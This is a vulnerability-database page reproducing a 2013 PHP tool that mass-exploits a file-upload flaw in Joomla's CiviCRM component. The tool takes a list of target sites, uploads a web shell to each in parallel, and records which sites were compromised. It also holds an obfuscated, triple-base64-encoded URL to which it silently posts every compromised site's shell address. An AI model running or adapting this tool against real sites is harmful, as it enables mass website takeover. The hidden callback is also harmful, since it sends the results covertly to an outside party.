Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Janissaries Joomla Civicrm Shell Upload

🗓️ 22 Apr 2013 00:00:00Reported by miyachungType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Janissaries Joomla Civicrm Shell Uploa

Code
`<?php  
/*  
----------------------------------------------------------------------------  
.__ .__   
_____ |__|___.__._____ ____ | |__ __ __ ____ ____   
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\   
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >  
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /   
\/ \/ \/ \/ \/ \//_____/   
-----------------------------------------------------------------------------  
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread  
* Coded by Miyachung  
* Stay away from lamers o.O  
* Contact: [email protected]  
* Special Thanks : B127Y  
* Site: http://janissaries.org  
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg  
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM  
* Coding date: 21.04.2013  
* Usage : php exploit.php site_list upload_file searchkeyword  
* Example: php exploit.php sites.txt shell.php searchkeyword  
*/  
set_time_limit(0);  
ob_start();  
class exploit  
{  
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";  
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";  
private $filename;  
private $url;  
private $file_to_upload;  
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";  
private $thread_maxsize;  
private $site_list;  
private $file_regex;  
private $save_file = "uploaded.txt";  
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";  
private $timeout_sec = 20;  
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";  
private $idnum = 31;  
  
public function __construct($site_list,$filename,$thread,$regex)  
{  
$this->site_list = file($site_list);  
$this->filename = $filename;  
$this->file_to_upload = file_get_contents($filename);  
$this->thread_maxsize = $thread;  
$this->url = base64_decode(base64_decode(base64_decode($this->token)));  
$this->file_regex = "/$regex/";  
  
echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";  
echo "[+]Coded by Miyachung\n";  
echo "[+]Stay away from lamers o.O\n";  
echo "[+]Contact: [email protected]\n";  
echo "[+]Special Thanks : B127Y\n";  
echo "[+]Site: http://janissaries.org\n";  
echo "##################################################\n";  
echo "[+]Total urls to try: ".count($this->site_list)."\n";  
echo "[+]File to upload: ".$this->filename."\n";  
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";  
echo "[+]Search Keyword: ".$regex."\n\n";  
ob_flush();  
flush();  
$this->miyachung();  
}  
private function miyachung()  
{  
$multi = curl_multi_init();  
$count = 0;  
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)  
{  
foreach($urls as $i => $url)  
{  
$curl[$i] = curl_init();  
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);  
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);  
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);  
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);  
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);  
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));  
curl_multi_add_handle($multi,$curl[$i]);  
}  
do  
{  
curl_multi_exec($multi,$active);  
}  
while($active > 0);  
foreach($curl as $id => $content)  
{  
$conn[$id] = curl_multi_getcontent($content);  
curl_multi_remove_handle($multi,$content);  
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))  
{  
$count++;  
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);  
if($check_it && preg_match($this->file_regex,$check_it))  
{  
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")  
{  
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);  
}  
else  
{  
exit("[-]Somethings has changed in tool! o.O!");  
}  
echo "###########################################################\n";  
echo "[!]Exploitation Successfullll!\n";  
printf("[%s]%s\n",$count,trim($urls[$id]));  
echo "###########################################################\n";  
ob_flush();  
flush();  
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);  
}  
else  
{  
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));  
ob_flush();  
flush();  
}  
}  
else  
{  
$count++;  
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));  
ob_flush();  
flush();  
}  
  
}  
  
}  
  
}  
private function get($url)  
{  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);  
$data= curl_exec($ch);  
curl_close($ch);  
return $data;  
}  
private function post($url)  
{  
$curl = curl_init();  
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);  
curl_setopt($curl,CURLOPT_URL,$this->url);  
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);  
$exec = curl_exec($curl);  
curl_close($curl);  
return $exec;  
}  
private function save($url,$count)  
{  
$file = fopen($this->save_file,'ab');  
fwrite($file,"#########################################################################\n");  
fwrite($file,"[!]Exploitation Successfullll!\n");  
fwrite($file,"[$count]$url\n");  
fclose($file);  
return true;  
}  
}  
  
if($argv[1] && $argv[2] && $argv[3] && $argv[4])  
{  
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);  
}  
else  
{  
print  
"  
----------------------------------------------------------------------------  
.__ .__   
_____ |__|___.__._____ ____ | |__ __ __ ____ ____   
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\   
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >  
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /   
\/ \/ \/ \/ \/ \//_____/   
-----------------------------------------------------------------------------  
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread  
* Coded by Miyachung  
* Stay away from lamers o.O  
* Contact: [email protected]  
* Special Thanks : B127Y  
* Site: http://janissaries.org  
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg  
* Coding date: 21.04.2013  
* Usage : php exploit.php site_list upload_file maxthread searchkeyword  
* Example: php exploit.php sites.txt shell.php 10 searchkeyword  
";  
}  
?>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Apr 2013 00:00Current
0.9Low risk
Vulners AI Score0.9
janissaries joomla civicrmexploitation toolmultithreadmiyachunglamersb127yjanissaries.orgyoutubeexploitation videoexploitsite_listupload_filesearchkeywordposted_file_pathpost_url_pathfilenamefile_to_uploadif_is_uploadedthread_maxsizefile_regexsave_fileuser_agenttimeout_sectokenidnumsite_listthreadregex
19